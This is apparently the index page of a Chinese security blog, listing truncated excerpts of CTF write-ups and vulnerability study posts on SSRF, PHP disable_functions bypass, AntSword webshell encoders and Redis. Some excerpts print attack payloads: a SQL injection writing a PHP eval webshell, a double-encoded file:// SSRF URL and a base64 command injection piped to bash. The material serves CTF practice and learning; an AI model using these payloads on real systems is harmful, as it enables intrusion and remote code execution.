hws硬件营线上选拔赛

2021-02-06 18:02:00 80
ctf - wp - hws

NodeMce 不清楚是否非预期,一个strings直接能看到flag STM stm32单片机,给了一个bin文件,根据http://www.crystalradio.cn/thread-637028-1-1.html来反编译。 ```c _BYTE sub_8000314() { _BYTE v0; // r4 unsigned __int8 *v1; // r5 int v...

NodeMce 不清楚是否非预期,一个strings直接能看到flag STM stm32单片机,给了一个bin文...

阅读全文>>

两个有趣的ssrf安全问题研究

2021-02-06 18:02:00 63
ssrf

文章首发于:i春秋 容错特性 我先甩出关于容错特性的一个概述:(php的容错特性)当有一个不存在的协议,即无法被成功解析,如hhhm://,将其放入file_get_contents中,会发现其报错,而究其所以是将这个自定义的协议置为null,而php中当协议为null或者file时会进行本地文件读取,也就是说我们可以当做进行本地文件的操作。 本地放一段代码: php <?php in...

文章首发于:i春秋 容错特性 我先甩出关于容错特性的一个概述:(php的容错特性)当有一个不存在的协议,即无法被成...

阅读全文>>

纵横杯

2020-12-28 10:12:00 441
ctf - wp - 纵横杯

easyci 注apache配置文件出来得到web路径为:/var/sercet/html/ 写shell,大小写绕过 password=a&username=-1' uNion sElect 1,'<?php eval($_POST[1]);?>' into outfile '/var/sercet/html/9.php'--+ hello_php www.zip源码...

easyci 注apache配置文件出来得到web路径为:/var/sercet/html/ 写shell,大小写...

阅读全文>>

bypass disable function学习

2020-12-25 23:12:00 506
漏洞学习 - bypass disable function

文章首发于:合天 从phpinfo中获取可用信息 信息收集是不可缺少的一环;通常的,我们在通过前期各种工作成功执行代码 or 发现了一个phpinfo页面之后,会从该页面中搜集一些可用信息以便后续漏洞的寻找。 我谈谈我个人的几个偏向点: 版本号 最直观的就是php版本号(虽然版本号有时候会在响应头中出现),如我的机器上版本号为: PHP Version 7.2.9-1 那么找到版本号后就会综...

文章首发于:合天 从phpinfo中获取可用信息 信息收集是不可缺少的一环;通常的,我们在通过前期各种工作成功执行...

阅读全文>>

roarctf 2020

2020-12-07 21:12:00 172
ctf - wp - roar

虽然题目质量不错。 //但是被注入恶心到的两天 签到 直接读flag读不到,读源码发现是curl,可以二次编码绕过 Payload: http://47.104.232.98:49725/?url=file:///fla%25%36%37 Hi_433MHz 导入au,短的是0,长的是1: 得到: 011001100 011011000 011000010 011001110 011110...

虽然题目质量不错。 //但是被注入恶心到的两天 签到 直接读flag读不到,读源码发现是curl,可以二次编码绕过...

阅读全文>>

蚁剑自写编码器

2020-12-03 20:12:00 165
备忘 - 蚁剑 - 编码器

ps:水文一篇,权当个人备忘 编码器常见于特殊webshell,如我们往webshell中压多一句base64用以绕过某些waf,那么蚁剑中自带了一些编码器,但在需要如多层base64时内置的编码器往往就不够用了。 base64 一个最简单的base64编码器编写如下: ```js /* * php::base64编码器 * Create at: 2020/11/21 15:21:10 ...

ps:水文一篇,权当个人备忘 编码器常见于特殊webshell,如我们往webshell中压多一句base64用以...

阅读全文>>

首届“祥云杯”网络安全大赛

2020-11-24 15:11:00 229
ctf - wp - 祥云杯

Command 签到题,过滤了如下: base64+%09绕一下过滤,因为匹配大小写,所以可能会出现这种情况: 稍微加点空格什么的修修改改就行了,payload: ?url=|echo%09"Y2FcdCAvZXRjLy5maW5kZmxhZy8q"|base64%09-d|ba\s\h flaskbot 通过各种让他报错拿到一份大概的源码: 可以看到这里用了render_templ...

Command 签到题,过滤了如下: base64+%09绕一下过滤,因为匹配大小写,所以可能会出现这种情况: ...

阅读全文>>

Redis常见漏洞学习

2020-11-15 13:11:00 191
漏洞学习 - redis

文章首发于:i春秋 简述 Redis(Remote Dictionary Server ),即远程字典服务,是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。 Redis支持主从同步。数据可以从主服务器向任意数量的从服务器上同步,从服务器可以是关联其他从服务器的主服务器。这使得Redis可执行单层树复制。存盘可以...

文章首发于:i春秋 简述 Redis(Remote Dictionary Server ),即远程字典服务,是一...

阅读全文>>

appsec_il ctf2020

2020-11-06 20:11:00 234
ctf - appsec_il

最后的xss some攻击学到了(虽然比赛遇到也许还是不会 Resume.yml Writing your resume on word is for rookies. Real programmers use yaml. ~~I hope I don't have any bugs~~ URL: https://resume-yml.appsecil.ctf.today/ By Meit...

最后的xss some攻击学到了(虽然比赛遇到也许还是不会 Resume.yml Writing your re...

阅读全文>>

西湖论剑2020

2020-10-13 17:10:00 470
ctf - 西湖论剑

题目质量很高,嗯,太菜了只能复现 EasyJson 源码: ```php <?php include 'security.php'; if(!isset($_GET['source'])){ show_source(FILE); die(); } $sandbox = 'sandbox/'.sha1($_SERVER['HTTP_X_FORWARDED_FOR']).'...

题目质量很高,嗯,太菜了只能复现 EasyJson 源码: ```php <?php include 'se...

阅读全文>>


CopyRight © 2019-2020 HhhM
Power By Django & Bootstrap
已运行
粤ICP备19064649号